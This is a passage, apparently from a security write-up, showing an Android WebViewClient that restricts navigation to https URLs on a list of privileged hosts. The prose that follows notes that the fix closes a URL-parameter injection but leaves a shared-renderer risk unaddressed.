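    public static final class PrivilegedClient extends WebViewClient {
        @Override
        public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
            Uri uri = request.getUrl();
            boolean allowed = "https".equalsIgnoreCase(uri.getScheme())
                    && uri.getHost() != null
                    && PRIVILEGED_HOSTS.contains(uri.getHost().toLowerCase());
            return !allowed;  // returning true cancels the navigation
        }
    }
}
```

This closes the url-parameter injection at the entry point, but it does not address the shared renderer process between WebViews of one app that the slides describe; that is why the deck's second suggestion, keeping high-risk operations in code an attacker-controlled page cannot reach, still applies.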
